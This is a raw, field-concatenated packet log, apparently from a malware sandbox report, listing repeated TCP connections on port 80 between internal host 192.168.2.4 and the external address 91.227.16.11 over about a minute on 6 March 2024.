                                                                                      Mar 6, 2024 09:52:46.287606001 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.498967886 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.527968884 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.628741026 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.631942034 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.656646967 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:46.813002110 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.813123941 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:46.814718008 CET4975380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:47.154891014 CET804975291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.155014038 CET4975280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:47.157125950 CET804975391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.157229900 CET4975380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:47.157269955 CET804975191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.157840014 CET4975380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:47.157851934 CET4975180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:47.499766111 CET804975391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.499793053 CET804975391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.500258923 CET4975380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:47.841790915 CET804975391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.870523930 CET804975391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:47.933890104 CET4975380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:48.037345886 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:48.067040920 CET4975380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:48.380553961 CET804975491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:48.380661011 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:48.380800009 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:48.723900080 CET804975491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:48.723937035 CET804975491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:48.724226952 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.067876101 CET804975491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:49.095474005 CET804975491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:49.136919022 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.233439922 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.234345913 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.577486038 CET804975491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:49.577562094 CET4975480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.577701092 CET804975591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:49.577784061 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.577935934 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.921087027 CET804975591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:49.933944941 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:49.937273979 CET804975591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:49.980673075 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.224410057 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.224777937 CET4975780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.277465105 CET804975591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.306214094 CET804975591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.306291103 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.362370014 CET4975880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.568051100 CET804975591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.568140030 CET4975580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.569699049 CET804975791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.569806099 CET4975780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.570000887 CET4975780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.705924034 CET804975891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.706154108 CET4975880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.706254005 CET4975880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:50.914907932 CET804975791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.914952040 CET804975791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:52:50.915596008 CET4975780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:52:51.049663067 CET804975891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:05.337569952 CET804977091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:05.337675095 CET804977191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:05.337678909 CET4977080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:05.337843895 CET4977180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:05.340398073 CET804977291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:05.340481997 CET4977280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:05.340676069 CET4977280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:05.685488939 CET804977291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:05.685585976 CET804977291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:05.685894012 CET4977280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:06.031131029 CET804977291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:06.061042070 CET804977291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:06.105846882 CET4977280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:06.189080000 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:06.530344009 CET804977391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:06.530426979 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:06.530637026 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:06.871968985 CET804977391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:06.871992111 CET804977391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:06.872237921 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:07.213421106 CET804977391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:07.242892981 CET804977391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:07.293241024 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:07.369259119 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:07.370197058 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:07.710484982 CET804977391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:07.710556984 CET4977380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:07.718655109 CET804977491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:07.718734980 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:07.718955994 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.067523956 CET804977491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:08.067553043 CET804977491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:08.067934036 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.416717052 CET804977491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:08.444546938 CET804977491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:08.496416092 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.584568977 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.586045980 CET4977280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.586419106 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.931504965 CET804977591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:08.931629896 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.932025909 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:08.933532953 CET804977491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:08.933608055 CET4977480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:09.276957035 CET804977591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:09.277007103 CET804977591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:09.277337074 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:09.622780085 CET804977591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:09.652546883 CET804977591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:09.699635029 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:09.747057915 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:09.748034954 CET4977680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:09.774662971 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.091475964 CET804977691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.091562986 CET4977680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.092026949 CET804977591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.092088938 CET4977580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.117861986 CET804977791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.117948055 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.118127108 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.461276054 CET804977791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.461328030 CET804977791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.461596012 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.808439970 CET804977791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.829400063 CET804977791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:10.871320963 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.949244022 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:10.950337887 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:11.291727066 CET804977891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:11.291943073 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:11.292047024 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:11.292078972 CET804977791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:11.292166948 CET4977780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:11.633306026 CET804977891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:11.633332014 CET804977891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:11.683864117 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:11.873644114 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:12.215231895 CET804977891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:12.241833925 CET804977891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:12.293231964 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:12.486107111 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:12.487226963 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:12.827830076 CET804977891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:12.828003883 CET4977880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:12.828583956 CET804977991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:12.828717947 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:12.829269886 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:13.171982050 CET804977991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:13.172041893 CET804977991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:13.172352076 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:13.513616085 CET804977991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:13.546758890 CET804977991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:13.590353012 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:13.668431997 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:14.015651941 CET804978091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:14.015777111 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:14.016043901 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:14.358860016 CET804978091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:14.358999014 CET804978091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:14.359235048 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:14.702413082 CET804978091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:14.734859943 CET804978091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:14.777584076 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:14.778991938 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:14.852636099 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.122873068 CET804978191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.123066902 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.123253107 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.195966005 CET804978291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.196387053 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.196578979 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.465923071 CET804978191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.466053009 CET804978191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.466387033 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.539556026 CET804978291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.539757967 CET804978291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.540092945 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.809361935 CET804978191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.839705944 CET804978191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.883305073 CET804978291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.886977911 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:15.912139893 CET804978291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:15.965188980 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.040055990 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.040150881 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.040255070 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.041065931 CET4978380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.383058071 CET804978091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:16.383086920 CET804978191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:16.383111954 CET804978291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:16.383161068 CET4978080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.383184910 CET4978180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.383328915 CET4978280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.384998083 CET804978391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:16.385077953 CET4978380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.385281086 CET4978380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:16.728590012 CET804978391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:16.728610039 CET804978391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:16.728928089 CET4978380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:17.072741032 CET804978391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:17.100050926 CET804978391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:17.152620077 CET4978380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:17.234368086 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:17.575571060 CET804978491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:17.575692892 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:17.575922966 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:17.917129993 CET804978491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:17.933948040 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:17.936156988 CET804978491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:17.980727911 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:18.275227070 CET804978491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:18.309480906 CET804978491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:18.355722904 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:18.434604883 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:18.435661077 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:18.775814056 CET804978491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:18.775873899 CET4978480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:18.778671980 CET804978591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:18.778736115 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:18.778947115 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.121864080 CET804978591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:19.136964083 CET804978591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:19.137192965 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.480446100 CET804978591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:19.510304928 CET804978591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:19.559139013 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.634510994 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.635654926 CET4978680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.977863073 CET804978591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:19.978077888 CET4978580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.981117964 CET804978691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:19.981219053 CET4978680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:19.981386900 CET4978680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:20.326816082 CET804978691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:20.327007055 CET804978691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:20.327337980 CET4978680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:20.672969103 CET804978691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:20.703233004 CET804978691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:20.746401072 CET4978680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:20.825675964 CET4978680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:20.826838017 CET4978780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:20.857573986 CET4978880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:21.172863007 CET804978791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:21.173681974 CET804978691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.496160030 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.496232986 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.496459007 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.717446089 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.717653036 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.717894077 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:39.842009068 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.842035055 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:39.842411041 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.061027050 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.089755058 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.137141943 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.187966108 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.214409113 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.262048960 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.336122036 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.337176085 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.337178946 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.678486109 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.678819895 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.678903103 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.679413080 CET804980791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.679474115 CET4980780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:40.682728052 CET804980891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:40.682779074 CET4980880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.020117998 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.020140886 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.020387888 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.362099886 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.388299942 CET804980991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.434113026 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.506522894 CET4976080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.506660938 CET4977980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.506742001 CET4980480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.511065960 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.856879950 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:41.857024908 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:41.857204914 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.202766895 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.202788115 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.203042030 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.548850060 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.577083111 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:42.621412992 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.696109056 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:42.697096109 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.038434029 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.038580894 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.038794994 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.041845083 CET804981091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.041904926 CET4981080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.379961014 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.379976988 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.380249977 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.721605062 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.748769999 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:43.793293953 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.868242025 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:43.870068073 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.209569931 CET804981191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.209666967 CET4981180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.216089010 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.216264009 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.216420889 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.562505960 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.562525034 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.562808990 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:44.908999920 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.933567047 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:44.980783939 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.053714037 CET4980980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.054069042 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.055063009 CET4981380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.107254028 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.226697922 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.395644903 CET804981391.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.395735979 CET4981380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.400049925 CET804981291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.400131941 CET4981280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.453660011 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.453942060 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.454027891 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.568190098 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.568278074 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.568485975 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.800453901 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.800508022 CET804981491.227.16.11192.168.2.4
